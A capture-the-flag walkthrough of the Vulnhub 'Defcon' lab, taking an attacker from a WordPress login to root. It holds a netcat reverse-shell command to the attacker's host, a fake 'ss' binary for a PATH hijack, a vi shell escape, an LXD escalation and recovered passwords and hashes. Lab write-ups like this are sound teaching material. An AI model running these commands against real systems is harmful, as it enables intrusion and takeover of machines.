[VLN] Defcon

Today we're going to hack the Vulnhub machine called Defcon. You can download it from the following link: Defcon



Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.136
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 21:40 CEST
Nmap scan report for 192.168.112.136
Host is up (0.00096s latency).
Not shown: 65531 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp  open   http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://nsa-server.net
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Job Search | Intelligence Careers
| ssl-cert: Subject: commonName=nsa-server/organizationName=National Security Agency/stateOrProvinceName=New-York/countryName=US
| Not valid before: 2019-06-10T14:04:18
|_Not valid after:  2019-07-10T14:04:18
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=6/14%Time=5EE67DC6%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,5,"!t>\r\n");
Service Info: Host: nsa-server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 289.46 seconds
Browsing to http://192.168.112.136 redirects us to nsa-server.net, which doesn't resolve, so we add nsa-server.net to /etc/hosts and then open http://nsa-server.net. Looking at the TLS certificate, under "Details -> Issuers" there is an e-mail address, john@nsa-secretserver.net. We add nsa-secretserver.net to /etc/hosts as well and visit https://nsa-secretserver.net/.

(Port 22, by the way, answered nmap's probe with junk rather than an SSH banner, so whatever listens there is not a normal sshd; the endlessh directory that shows up in /root at the end of this writeup suggests why. The real sshd turns up later.)

If we watch the console "animation" on the front page, right at the end we can see:

DATA EXFILTRATION STARTING……………………..
-/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--

END OF TRANSMISSION!
REBOOTING SYSTEM…………………………
It looks like Morse code, so let's work out what it says. First we remove the "\" characters (they are the word separators; dropping them just runs the words together). The "/" characters separate letters and can be kept or replaced with a space. That leaves:

- .... . .-- --- .-. -.. .--. .-. . ... ... .--. .- ... ... .-- --- .-. -.. --- ..-. .--- --- .... -. .. ... ... - .---- .-.. .-.. ...-- .- ... -.-- -.-.-- -.-.-- -.-.--
With the "cleaned" Morse we go to the following site and translate it: https://morsecode.world/international/translator.html The result is:

THEWORDPRESSPASSWORDOFJOHNISST1LL3ASY!!!
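Decoding the transmission in code, as an added example that is not part of the original writeup: the string below is copied from the console animation above (including the ellipsis characters the page renders in place of three dots), the table is the standard ITU Morse alphabet, and the point it shows is that "\" is the word separator and "/" the letter separator, so keeping the backslashes as spaces yields the sentence with its word breaks instead of the run-together string the web translator produced.

```python
# Added example (not from the original writeup): decode the exfiltrated Morse string.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "-.-.--": "!", "..--..": "?", ".-.-.-": ".", "--..--": ",", ".--.-.": "@",
    "-....-": "-", "-..-.": "/", "---...": ":", "-...-": "=", ".-.-.": "+",
}

# The string as it appears on the page (copy-pasted). The page renders "..." as the
# single ellipsis character U+2026, which has to be normalised back before decoding.
RAW = (r"-/..../.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/"
       r"..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--")


def normalise(text: str) -> str:
    """Undo the typographic mangling: U+2026 ellipsis back to three dots."""
    return text.replace("\u2026", "...")


def to_spaced(text: str) -> str:
    """The 'cleaned' form web translators accept: letters separated by one space,
    words separated by ' / '."""
    words = [w for w in normalise(text).split("\\") if w]
    return " / ".join(" ".join(t for t in w.split("/") if t) for w in words)


def decode_morse(text: str, letter_sep: str = "/", word_sep: str = "\\") -> str:
    """Decode Morse; unknown symbols become '?' rather than silently vanishing."""
    words = []
    for word in normalise(text).split(word_sep):
        tokens = [t for t in word.split(letter_sep) if t]
        if tokens:
            words.append("".join(MORSE.get(t, "?") for t in tokens))
    return " ".join(words)


if __name__ == "__main__":
    print(to_spaced(RAW))
    print(decode_morse(RAW))
```

Run stand-alone it prints the spaced form (what was pasted into the translator) and then the decoded sentence with its word breaks; the separators are parameters, so the same function handles the more usual "letters by space, words by /" layout.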
Reading it, the message is THE WORDPRESS PASSWORD OF JOHN IS ST1LL3ASY!!!, so the WordPress credentials are JOHN / ST1LL3ASY!!!

Knowing this we go to https://nsa-secretserver.net/wp-admin and log in with those credentials. Then: WORDPRESS -> TOOLS -> WPTERM, and we have a terminal :) We start an nc listener on our machine.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
In the "web" terminal we run:

graham:/var/www/wordpress $ nc -e /bin/bash 192.168.112.128 5555
And we get the reverse shell, which we upgrade to a proper pty with python3.

Graham to John



sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.136] 49098
python3 -c 'import pty; pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham$
Exploring the system a bit, in the mbox file in graham's home directory we find the following:

graham@nsa-server:/home/graham$ cat mbox

From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: 
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
        (envelope-from )
        id 1haGiS-0004Sh-6R
        for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: 
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: 
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John
It seems "john" forgot his password. We keep looking around the system and check the .viminfo file.

graham:/home/graham $ cat .viminfo
---SNIP---
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Debug Line History (newest to oldest):

# Registers:
""1	LINE	0
	export SSLKEYLOGFILE=/home/graham/master.log
|3,1,1,1,1,0,1557842873,"export SSLKEYLOGFILE=/home/graham/master.log"

# File marks:
'0  20  0  ~/.local/share/Trash/files/note.txt
|4,48,20,0,1560159846,"~/.local/share/Trash/files/note.txt"
----SNIP----
Apparently he has been editing note.txt (the register history also records an export SSLKEYLOGFILE=/home/graham/master.log, which we leave aside). Let's look at the note.

graham@nsa-server:/home/graham$ cat ~/.local/share/Trash/files/note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? 
Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.

hahahaha......now who is a cybernoob!!!!

Best,

Graham

P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
Looking closely at the message, john's password is spelled out by the capital letters in the P.S., so john's password is YDNETSRIDH. With those credentials we switch to the user john.

graham@nsa-server:/home/graham$ su john
Let's see what john can do with sudo.

john@nsa-server:~$ sudo -l
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh
We can start ssh, so let's start it :)

john@nsa-server:~$ sudo /bin/systemctl start ssh
Let's check which port it listens on.

john@nsa-server:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 10.14.185.1:53          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:222             0.0.0.0:*               LISTEN      -
sshd listens on port 222 (which is why nmap reported 222 as closed earlier: the service wasn't running yet), so we log in as john over ssh.

John to George



sml@m0nique:~$ ssh john@192.168.112.136 -p 222
john@192.168.112.136's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Wed Apr 22 13:16:25 2020 from 192.168.20.131
john@nsa-server:~$
Exploring the system as john, we find an odd file in /home/john/Documents called secret.png. We copy it to our machine.

sml@m0nique:~$ scp -P 222 john@192.168.112.136:/home/john/Documents/secret.png .
Let's see what type of file it really is.

sml@m0nique:~$ file secret.png
secret.png: PDF document, version \012.\012
The extension is .png, but the file command says it's a PDF document (the "version" it prints, \012.\012, is just newline, dot, newline: the fake header is the 8 bytes %PDF- plus filler, so only the signature was overwritten, not the image data). We open the file with GHEX and replace the header with 89 50 4E 47 0D 0A 1A 0A, i.e. the PNG signature. Once the header is changed we save, and the file opens as an image. It shows the password: 2W3dsF5tGh-Kl#1 Trying it against the system users, it belongs to george. We connect as george...
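The same header repair in code, as an added example that is not part of the original writeup: it sniffs the magic bytes the way file does, rewrites the first eight bytes with the PNG signature, and then walks the chunk list checking every CRC, which is the check worth doing before trusting a "repaired" image (a file that was really a PDF would fail it). The sample input is constructed in memory (a one-pixel PNG whose signature is overwritten with the fake %PDF- header that file reported), since the machine's secret.png is not reproduced here; the file names in the usage line are placeholders.

```python
# Added example (not from the original writeup): detect, repair and validate a PNG
# whose 8-byte signature was overwritten with a fake PDF header.
import struct
import sys
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"      # 89 50 4E 47 0D 0A 1A 0A
FAKE_PDF_HEADER = b"%PDF-\n.\n"      # 8 bytes; `file` reads it as "PDF document, version \012.\012"


def sniff(data: bytes) -> str:
    """Cheap magic-byte check, the same first step `file` takes."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "unknown"


def restore_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the real PNG signature (what GHEX did by hand)."""
    return PNG_SIG + data[8:]


def png_chunks(data: bytes):
    """Walk the chunk list, yielding (type, length, crc_ok). Stops at IEND or truncation."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):                      # truncated chunk: report and stop
            yield ctype.decode("ascii", "replace"), length, False
            return
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        yield ctype.decode("ascii", "replace"), length, (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc
        pos = end
        if ctype == b"IEND":
            return


def is_valid_png(data: bytes) -> bool:
    """Signature plus IHDR first, IEND last, and every chunk CRC intact."""
    chunks = list(png_chunks(data))
    return (bool(chunks) and chunks[0][0] == "IHDR" and chunks[-1][0] == "IEND"
            and all(ok for _, _, ok in chunks))


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


def make_sample() -> bytes:
    """Constructed input: a valid 1x1 RGB PNG with its signature swapped for the
    fake PDF header, mimicking the damaged secret.png."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00" + b"\xff\x00\x00")      # filter byte + one red pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return FAKE_PDF_HEADER + png[8:]


def repair_file(path: str, out_path: str) -> bool:
    """Rewrite the signature and only keep the result if the chunk structure checks out."""
    with open(path, "rb") as f:
        data = f.read()
    fixed = restore_png_signature(data)
    ok = is_valid_png(fixed)
    if ok:
        with open(out_path, "wb") as f:
            f.write(fixed)
    return ok


if __name__ == "__main__":
    # usage: python3 fixpng.py secret.png secret.fixed.png   (file names are placeholders)
    if len(sys.argv) == 3:
        print("repaired" if repair_file(sys.argv[1], sys.argv[2]) else "chunk structure still broken")
    else:
        sample = make_sample()
        fixed = restore_png_signature(sample)
        print(sniff(sample), "->", sniff(fixed), "valid:", is_valid_png(fixed))
```

Without arguments it runs on the constructed sample; with two arguments it repairs a real file and refuses to write the output if any chunk CRC fails, which is what separates "someone changed the magic bytes" from "this is not a PNG at all".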

George to Samantha



sml@m0nique:~$ ssh george@192.168.112.136 -p 222
george@192.168.112.136's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:56:10 2020 from 192.168.20.131
Let's see what george can do with sudo.

george@nsa-server:~$ sudo -l
[sudo] password for george:
Matching Defaults entries for george on nsa-server:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User george may run the following commands on nsa-server:
    (samantha) /usr/bin/vi
george can run vi as samantha. Let's do that.

george@nsa-server:~$ sudo -u samantha /usr/bin/vi
And to get a shell as samantha from inside vi (the usual shell escape):

:!/bin/bash

Samantha to Nicky


In samantha's home directory there is an interesting file, check.

samantha@nsa-server:~$ cd /home/samantha
samantha@nsa-server:~$ ls -l                                                                                                                                    
total 60                                                                           
-rwsr-xr-x 1 root     root     8792 Apr 10 16:17 check   
Running it prints the output of the ss command. Let's look at its strings.

samantha@nsa-server:~$ strings check
---SNIP---
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
puts
system
__cxa_finalize
setgid
__libc_start_main
ss -tupan
.comment
strings shows that it calls ss -tupan without a full path... Knowing this, we'll supply an "ss" of our own that gives us a shell. First we prepend the current directory to PATH, so our fake ss is found before the real one.

samantha@nsa-server:~$ export PATH=.:$PATH
samantha@nsa-server:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Now we write the fake ss (here directly on the target).

samantha@nsa-server:~$ cat ss.c
/* headers restored: the <...> names were lost from the page */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
/* Fake "ss": try to become root, then hand over a shell.
   Adding #include <stdlib.h> would silence the warning below about system(). */
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
    return 0;
}
samantha@nsa-server:~$ gcc -o ss ss.c
ss.c: In function 'main':
ss.c:7:1: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
 system("/bin/bash");
 ^~~~~~
We make it executable. (The u+s bit is harmless but buys nothing here, as the result below shows: the shell comes back as nicky rather than root, because check evidently drops to nicky with setuid()/setgid() before invoking ss, so our setuid(0) fails, and bash would drop a mismatched effective uid anyway.)

samantha@nsa-server:~$ chmod u+s ss
samantha@nsa-server:~$ chmod +x ss
Finally, we run it!

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

bash-4.4$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
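What the hijack relies on, as an added example that is not part of the original writeup: system("ss -tupan") hands the command line to /bin/sh, which resolves the bare name ss through PATH in order, so whichever directory comes first wins. The code below reproduces that resolution with shutil.which, using a throwaway directory in place of the "." the writeup prepends, and lists the PATH entries an attacker can satisfy. The directory and the fake ss script are constructed for the demo.

```python
# Added example (not from the original writeup): show how a bare command name in
# system() is resolved through PATH, and which PATH entries make that hijackable.
import os
import shutil
import tempfile

# The secure_path sudo showed on this box.
SYSTEM_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(name: str, path_env: str):
    """First executable called `name` along path_env, i.e. what `sh -c 'name ...'` runs."""
    return shutil.which(name, path=path_env)


def hijackable_entries(path_env: str):
    """PATH entries an unprivileged user can satisfy: relative ones ('' or '.' resolve
    against the caller's cwd) and absolute directories we can write to."""
    weak = []
    for entry in path_env.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            weak.append(entry or "<empty>")
        elif os.path.isdir(entry) and os.access(entry, os.W_OK):
            weak.append(entry)
    return weak


def plant_fake(dirname: str, name: str = "ss") -> str:
    """Drop a stand-in for the real binary; this one just execs a shell."""
    path = os.path.join(dirname, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\nexec /bin/sh\n")
    os.chmod(path, 0o755)
    return path


def demo() -> dict:
    """Compare resolution with and without an attacker-controlled directory in front."""
    work = tempfile.mkdtemp(prefix="hijack-")      # stands in for the "." of `export PATH=.:$PATH`
    try:
        fake = plant_fake(work)
        attacker_path = work + os.pathsep + SYSTEM_PATH
        return {
            "fake": fake,
            "with_hijack": resolve_command("ss", attacker_path),
            "without_hijack": resolve_command("ss", SYSTEM_PATH),
            "weak_entries": hijackable_entries(attacker_path),
        }
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:15} {value}")
```

The fix on the program side is the mirror image: invoke the tool by absolute path (or execve() it directly with a fixed argv and a clean environment) instead of passing a bare name to system(), and never trust the caller's PATH from a setuid binary.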

Nicky to Root


Now that we are "nicky", let's explore the system.

bash-4.4$ cd /home/nicky/Documents
bash-4.4$ ls -la
total 12
drwxr-xr-x  2 nicky nicky 4096 Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4096 Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
bash-4.4$ cat .passwd
We_iuh#-qaSW1
It looks like we've found her password :) We use it to connect via ssh as nicky.

sml@m0nique:~$ ssh nicky@192.168.112.136 -p 222
nicky@192.168.112.136's password: 
nicky@nsa-server:~$
Let's see whether nicky can connect to MySQL.

nicky@nsa-server:~$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
We're in MySQL :) Let's look at the databases.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)
We pick the mysql database.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Let's list its tables.

MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)
There is an interesting table, user. Let's take a look.

MariaDB [mysql]> select * from user;
---SNIP---
+-----------+---------+-------------------------------------------+
| Host      | User    | Password                                  |
+-----------+---------+-------------------------------------------+
| localhost | admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| %         | smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| localhost | nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 |
+-----------+---------+-------------------------------------------+
---SNIP---
5 rows in set (0.00 sec)
The user smith shows up (with Host %, so that account may log in to MariaDB from any address, whereas the others are localhost only). The hashes are MySQL's native format, "*" followed by SHA1(SHA1(password)). Searching Google for the hash takes us to https://twitter.com/onlinehashcrack/status/287432972456562689, where the password is shown to be abygurl69. We log in as smith.

smith is in the lxc group. We look for the lxc executable and add its directory to $PATH.
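An offline alternative to googling the hash, as an added example that is not part of the original writeup: the mysql_native_password scheme stores "*" followed by SHA1(SHA1(password)) in uppercase hex, so any candidate can be verified locally. The three hashes are the ones from the mysql.user dump above; the candidate list is constructed for the example from the passwords recovered so far on this box plus the one the tweet gives, and the code only reports which candidate, if any, matches which account.

```python
# Added example (not from the original writeup): verify MySQL/MariaDB
# mysql_native_password hashes offline instead of searching for them.
import hashlib

# Host/User/Password rows from the page's `select * from user` output.
MYSQL_USERS = {
    "admin": ("localhost", "*6B6D111D0EC8D42C2955E082DD087C3E56B17F98"),
    "smith": ("%",         "*BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13"),
    "nicky": ("localhost", "*75961C95665DC2BAC3F947AF4C60FD73564BCFE2"),
}

# Constructed candidate list: every password seen on this box plus the tweet's answer.
CANDIDATES = ["ST1LL3ASY!!!", "YDNETSRIDH", "2W3dsF5tGh-Kl#1", "We_iuh#-qaSW1", "abygurl69"]


def mysql_native_password(password: str) -> str:
    """'*' + hex(SHA1(SHA1(pw))) in upper case, as stored by mysql_native_password.
    The inner digest is fed in raw (20 bytes), not as hex: that is the usual mistake."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def check(candidate: str, stored_hash: str) -> bool:
    return mysql_native_password(candidate) == stored_hash.strip().upper()


def crack(stored_hash: str, candidates):
    """Return the first candidate that hashes to stored_hash, else None."""
    for cand in candidates:
        if check(cand, stored_hash):
            return cand
    return None


def crack_all(users=MYSQL_USERS, candidates=CANDIDATES) -> dict:
    """Map user -> matching candidate (or None). Accounts with Host '%' are reachable
    from any address, so they are the ones to check first."""
    return {user: crack(h, candidates) for user, (_, h) in users.items()}


if __name__ == "__main__":
    for user, (host, h) in MYSQL_USERS.items():
        print(f"{user:6} @{host:10} {h} -> {crack(h, CANDIDATES)}")
```

Because the scheme is unsalted, the same password always produces the same hash, which is exactly why a web search for the hash string can work at all; the same property makes a local wordlist check trivial.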

smith@nsa-server:~$ whereis lxc
lxc:
smith@nsa-server:~$ find / -name lxc 2>/dev/null
/etc/bash_completion.d/lxc
/usr/share/bash-completion/completions/lxc
/var/snap/lxd/common/lxc
/snap/bin/lxc
/snap/lxd/10756/bin/lxc
/snap/lxd/10756/commands/lxc
/snap/lxd/10756/lxc
/home/smith/snap/lxd/10756/.config/lxc
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
In /home/smith there is a shell script called lxd-exploit.sh which may do the job... Run without parameters, it tells us it needs the name of an existing container.

smith@nsa-server:~$ sh lxd-exploit.sh
The exploit currently requires an existing container.
Let's list the existing containers.

smith@nsa-server:~$ lxc list
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
+---------+---------+------+------+------------+-----------+
There is a container called nsa-lab. Knowing its name, we run the exploit.

smith@nsa-server:~$ sh lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
Let's enjoy our sudo superpowers! What the script did is visible in its output: it turned on security.privileged for the container, mounted the host's root filesystem into it as a disk device, and from inside the container appended smith to /etc/sudoers. This is the standard LXD escalation: being able to talk to the LXD daemon is equivalent to root on the host.

Privilege Escalation



smith@nsa-server:~$ sudo su
root@nsa-server:/home/smith#
And now, as root, we finish exploring...

root.txt



root@nsa-server:~# ls
clean.sh  Documents  endlessh  names     Public    snap       thinclient_drives
Desktop   Downloads  Music     Pictures  root.txt  Templates  Videos
root@nsa-server:~# cat root.txt

CONGRATULATIONS!!!!

YOU JUST PWND THIS MACHINE

End


And with that we are root on the machine :)